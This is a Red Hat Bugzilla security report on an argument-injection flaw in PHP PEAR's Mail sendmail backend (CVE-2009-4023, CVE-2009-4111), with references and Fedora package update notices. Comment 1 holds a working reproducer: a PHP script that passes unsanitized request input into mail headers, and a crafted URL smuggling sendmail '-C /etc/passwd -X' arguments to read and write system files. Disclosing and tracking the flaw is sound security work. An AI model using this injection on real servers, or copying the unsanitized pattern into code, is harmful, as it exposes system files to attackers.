Bug 540842 - (CVE-2009-4023, CVE-2009-4111) CVE-2009-4023 CVE-2009-4111 php-pear-Mail: Absent sanitization of mail header fields
CVE-2009-4023 CVE-2009-4111 php-pear-Mail: Absent sanitization of mail header...
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
high Severity high
: ---
: ---
Assigned To: Red Hat Product Security
http://pear.php.net/bugs/bug.php?id=1...
impact=important,source=osssecurity,r...
: Security
Depends On: 541964
Blocks:
  Show dependency treegraph
 
Reported: 2009-11-24 05:37 EST by Jan Lieskovsky
Modified: 2010-12-21 17:04 EST (History)
2 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2010-12-21 17:04:57 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Jan Lieskovsky 2009-11-24 05:37:59 EST
PEAR's Mail class did not properly escape content of mail header fields,
when using the sendmail backend. A remote attacker could send an email
message, with specially-crafted headers to local user, leading to 
disclosure of content and potentially, to modification of arbitrary
system file, once the email message was processed by the PEAR's Mail
class.

References:
-----------
http://pear.php.net/bugs/bug.php?id=16200
http://bugs.debian.org/557121
http://secunia.com/advisories/37410/
http://www.debian.org/security/2009/dsa-1938

Upstream patch:
---------------
http://pear.php.net/bugs/bug.php?id=16200&edit=12&patch=quick-fix&revision=1241757412

Please pay attention also to comment:

[2009-11-21 08:19 UTC] rgeissert (Raphael Geissert)

which suggest the proposed patch might be incomplete.

CVE Request:
------------
http://www.openwall.com/lists/oss-security/2009/11/23/13
Comment 1 Jan Lieskovsky 2009-11-24 05:43:06 EST
Reproducer:
-----------
<?php
ini_set('include_path',ini_get('include_path').':/usr/local/lib/php/PEAR:');
require_once("Mail.php");
$from = "From: " . $_REQUEST['email'] . "\r\n";
$to = "xxxxxxx@zzzz.com";
$subj = "subscription request";
$body = "subscribe me"; $hdrs = array(
"To" => $to,
"Cc" => $cc,
"Bcc" => $bcc,
"From" => $from,
"Subject" => $subject,
);
$body="test";
$mail =& Mail::factory('sendmail');
$mail->send($to, $hdrs, $body);
?>

test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3

Note: You might need to change the patch to ':/usr/share/pear/:'.
      After this I can view the content of my /etc/passwd with
      some add-ons as /tmp/wokao.
Comment 2 Jan Lieskovsky 2009-11-24 05:44:54 EST
This issue affects the versions of the php-pear-Mail package, as shipped
with Fedora release of 10, 11, 12 and as shipped with Extra Packages
for Enteprise Linux 5 (EPEL-5) project.

Please fix.
Comment 3 Jan Lieskovsky 2009-11-25 03:44:16 EST
This is CVE-2009-4023.
Comment 5 Fedora Update System 2009-11-27 14:08:50 EST
php-pear-Mail-1.1.14-5.el5.1 has been submitted as an update for Fedora EPEL 5.
http://admin.fedoraproject.org/updates/php-pear-Mail-1.1.14-5.el5.1
Comment 6 Jan Lieskovsky 2009-11-29 11:36:45 EST
Common Vulnerabilities and Exposures assigned a separate identifier of  CVE-2009-4111 for the missing sanitization of the $recipients header of php-pear-Mail:

Argument injection vulnerability in Mail/sendmail.php in the Mail
package 1.1.14, 1.2.0b2, and possibly other versions for PEAR allows
remote attackers to read and write arbitrary files via a crafted
$recipients parameter, and possibly other parameters, a different
vulnerability than CVE-2009-4023.

References:
-----------
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4111
http://www.openwall.com/lists/oss-security/2009/11/23/8
http://www.openwall.com/lists/oss-security/2009/11/28/2
http://pear.php.net/bugs/bug.php?id=16200
https://bugs.gentoo.org/show_bug.cgi?id=294256
Comment 7 Fedora Update System 2009-11-30 23:20:46 EST
php-pear-Mail-1.1.14-5.fc11 has been pushed to the Fedora 11 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 8 Fedora Update System 2009-11-30 23:29:06 EST
php-pear-Mail-1.1.14-5.fc12 has been pushed to the Fedora 12 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 9 Fedora Update System 2009-11-30 23:41:35 EST
php-pear-Mail-1.1.14-5.fc10 has been pushed to the Fedora 10 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 10 Fedora Update System 2009-12-01 13:25:47 EST
php-pear-Mail-1.1.14-5.el5.1 has been pushed to the Fedora EPEL 5 stable repository.  If problems still persist, please make note of it in this bug report.

Note You need to log in before you can comment on or make changes to this bug.